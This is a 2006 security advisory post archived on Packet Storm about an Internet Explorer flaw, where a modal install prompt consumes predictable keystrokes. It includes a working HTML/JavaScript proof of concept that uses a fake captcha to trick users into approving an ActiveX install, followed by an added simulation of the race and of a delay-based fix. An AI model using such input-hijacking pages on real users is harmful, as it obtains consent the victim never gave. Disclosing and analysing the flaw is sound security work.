ietest.html.txt

2006-04-28T00:00:00
ID PACKETSTORM:45803
Type packetstorm
Reporter Matthew Murphy
Modified 2006-04-28T00:00:00

Description

                                        
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: RIPEMD160  
  
Dear Lists:  
  
Apparently I wasn't clear enough with this paragraph of my advisory, or  
a sizeable portion of the list readership elected to ignore it:  
  
"A malicious user could create content that would request the user to  
click an object or press a sequence of keys. By delivering a security  
prompt during this process, the site could subvert the prompting and  
obtain permission for actions that were not necessarily authorized."  
  
It seemed fairly clear to me, but apparently it sounded better to me  
than it did to some readers. :-(  
  
Basically, the scenario for the vulnerability is as follows:  
  
* Ask for user input that is predictable (mouse clicks, text string with  
the letter 'y', etc.)  
  
* Display a modal security prompt that will "eat" that input and treat  
it as a "Permit" answer to the security prompt.  
  
The result: compromise of security, potentially including arbitrary code  
execution.  
  
A particular scenario was identified that involved the exploitation of  
the modal ActiveX prompt delivered by some systems. The user is asked  
to type a certain string of characters (à la captcha). A prompt will be  
displayed (hopefully during the time the user is typing the string) to  
install the Microsoft Surround Video Control.  
  
If you're still typing the "captcha" when the prompt appears, you'll  
install the control. This works as advertised against all systems  
EXCEPT Windows XP SP2 and Windows Server 2003 SP1. If the software you  
install hoses your box, just remember that it's signed by Microsoft. In  
other words... don't look at me.  
  
Other prompts on XP SP2 and 2003 SP1 are exploitable for various gains  
as well. Virtually any prompt that wasn't commonly displayed on a web  
page prior to these updates is still handled via the (risky) modal  
dialog model. One example is the "Allow Paste Operations via Script"  
prompt that is displayed when a web page attempts to access the  
clipboard. Another example is "Initialize and Script ActiveX controls  
not marked as safe" prompt, which is somewhat mitigated by LMZ lockdown.  
  
All of those cases are exploitable in the same way as this one -- you  
simply have to change the "unsafe" action. Rather than having a page  
generate an ActiveX install, for instance, you could have it try to  
sniff the clipboard, initiate install-on-demand, or some other suspect  
action. The ability to cause the action to be approved silently is  
achieved the same way -- having a user unwittingly enter a 'Y' to the  
prompt.  
  
As you might notice, the exploit vector is virtually identical to that  
of MS05-054. I'm beginning to wonder if maybe it isn't the triviality  
of the remaining issues making them hard for people to envision. After  
all, Jesse Ruderman provides all of the theory and Secunia even  
demonstrates it for us with the file download dialog exploit code. The  
follow-up attack to such precise, detailed research is not a terribly  
creative one -- it merely involves piecing together what somebody else  
missed, ignored or didn't research to its full depth. This is a really  
easy class of attack to eliminate completely when compared to other more  
insidious attack vectors, and I expect that this process will eventually  
happen.  
  
Note that the standard disclaimer (that your use of this is at your own  
risk) still applies. Perhaps more so this time, because there's  
Microsoft code coming down along with the exploit. Not to say that my  
code is less buggy than Microsoft's (at least, not if I wrote a few  
billion lines of it) rather that it's third-party software and may be  
subject to unforeseen security risks, incompatibilities or other  
maladies (à la COM Object Instantiation or MS06-015).  
  
-- 
"Social Darwinism: Try to make something idiot-proof,  
nature will provide you with a better idiot."  
  
-- Michael Holstein  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.2 (MingW32)  
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xB5444D38  
  
iD8DBQFEULsifp4vUrVETTgRA+22AKCl1mkmE5EVB2R+Nv+H64VynQccmQCcCPMx  
oGy6Mz4Lcoj7ZyPhQ+LEB2I=  
=+LbS  
-----END PGP SIGNATURE-----  
  
<HTML>
<HEAD>
<TITLE>Internet Explorer ActiveX Installation Vulnerability</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<SCRIPT>

// Inject an <OBJECT> for the Microsoft-signed Surround Video control with a
// CODEBASE pointing at Microsoft's own CAB. Once IE has fetched the CAB,
// affected systems raise a modal "install this control?" prompt.
function doInstallControl() {

	document.body.innerHTML +=
		"<OBJECT CLASSID=\"clsid:928626A3-6B98-11CF-90B4-00AA00A4011F\" TYPE=\"application/x-oleobject\" CODEBASE=\"http://activex.microsoft.com/activex/controls/museum/MSSurVid.cab#Version=1,2,0,7\" WIDTH=\"325\" HEIGHT=\"250\">\r\n" +
		"<PARAM NAME=\"SurroundRect\" VALUE=\"0,0,325,250\">\r\n" +
		"<PARAM NAME=\"Image\" VALUE=\"ritetree.jpg\">\r\n" +
		"</OBJECT>";

	// Keep the caret in the "captcha" field so the victim keeps typing;
	// whatever is typed after the modal prompt appears goes to the prompt.
	document.getElementById("captcha").focus();
}

// IE-only: relies on the global window.event and on keypress keyCode being
// the character code. 78 = 'N', 110 = 'n'. The lure string begins with "on",
// so the second keystroke starts the install; the many 'y' characters that
// follow are read by the prompt as "Yes".
function doWaitEntry() {

	if (event.keyCode == 78 || event.keyCode == 110) {
		doInstallControl();
	}

}

</SCRIPT>

<FORM ACTION="" METHOD="GET">
Please enter the text you see on the left:<BR><BR>

<B>on3l1y6y8y5y</B> <INPUT TYPE="text" ID="captcha" ONKEYPRESS="doWaitEntry()">
</FORM>

</BODY>
</HTML>
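The race the advisory describes, as an added example; this is not Matthew Murphy's code and is not part of ietest.html. It models the PoC's lure string being typed into the "captcha" field, the modal prompt raised by the 'n' keystroke, and the later keystrokes landing in the prompt as accelerator keys. It then runs the same stream against a prompt that discards input for its first second on screen, which is the class of fix the post says would eliminate the attack. The typing pace, the prompt latency, the user's reaction time and the "y = Yes, n = No" accelerator mapping are assumptions.

```javascript
// Added example, not part of the original post or its PoC.
// Simulates a predictable keystroke stream being fed to a modal security
// prompt, with and without an accept delay on the prompt.

const TRIGGER_KEYS = new Set(['n', 'N']);   // keyCode 78/110 in the PoC
const YES_KEYS = new Set(['y', 'Y']);       // assumed "Yes"/"Install" accelerator
const NO_KEYS = new Set(['n', 'N']);        // assumed "No" accelerator

// Constructed keystroke stream: `text` typed at a fixed interval (ms).
function typeAt(text, intervalMs, startMs = 0) {
  return Array.from(text, (key, i) => ({ key, t: startMs + i * intervalMs }));
}

// Simulate page + prompt + user.
//   promptLatencyMs : time from the trigger keystroke until the modal appears
//                     (CAB download, signature check); assumed value.
//   acceptDelayMs   : 0 = the prompt acts on input immediately (vulnerable);
//                     >0 = the prompt discards input until it has been
//                     visible that long (the mitigation).
//   userReactionMs  : how long after the prompt appears the user notices it
//                     and stops typing; assumed value.
function simulate(keystrokes, { promptLatencyMs, acceptDelayMs, userReactionMs }) {
  let promptOpensAt = null;
  let decision = null;            // 'permit' | 'deny' | null (prompt still open)
  const field = [];               // what actually reached the text field
  let swallowed = 0;              // keys eaten by the prompt without effect

  for (const { key, t } of keystrokes) {
    if (promptOpensAt === null || t < promptOpensAt) {
      // No modal yet: the key goes to the page's text field.
      field.push(key);
      if (promptOpensAt === null && TRIGGER_KEYS.has(key)) {
        promptOpensAt = t + promptLatencyMs;
      }
      continue;
    }
    // The modal is up. Once the user has noticed it, they stop typing.
    if (t >= promptOpensAt + userReactionMs) break;
    const age = t - promptOpensAt;
    if (age < acceptDelayMs) { swallowed++; continue; }  // mitigation window
    if (YES_KEYS.has(key)) { decision = 'permit'; break; }
    if (NO_KEYS.has(key))  { decision = 'deny';   break; }
    swallowed++;                                         // not an accelerator
  }
  return { decision, field: field.join(''), promptOpensAt, swallowed };
}

// The PoC's lure string, typed at an assumed 200 ms per key.
const LURE = 'on3l1y6y8y5y';
const stream = typeAt(LURE, 200);

// Vulnerable prompt: acts on the first 'y' that arrives after it opens.
const vulnerable = simulate(stream, { promptLatencyMs: 500, acceptDelayMs: 0, userReactionMs: 700 });
// Mitigated prompt: ignores input for its first second on screen.
const mitigated = simulate(stream, { promptLatencyMs: 500, acceptDelayMs: 1000, userReactionMs: 700 });

console.log('vulnerable:', vulnerable);  // decision 'permit', field 'on3l'
console.log('mitigated:', mitigated);    // decision null: the user sees the prompt
```

Two things the run makes concrete. First, the lure has to be built so that an accelerator key reaches the prompt before the user notices it: with the same timings, a string such as "on3l1x6x8x" raises the prompt but never answers it. Second, the accept delay only helps when it is longer than the time the user needs to register the dialog; a 'y' typed after the window has elapsed is still taken as consent, so the delay is a guard against reflexive input, not a substitute for a non-modal design.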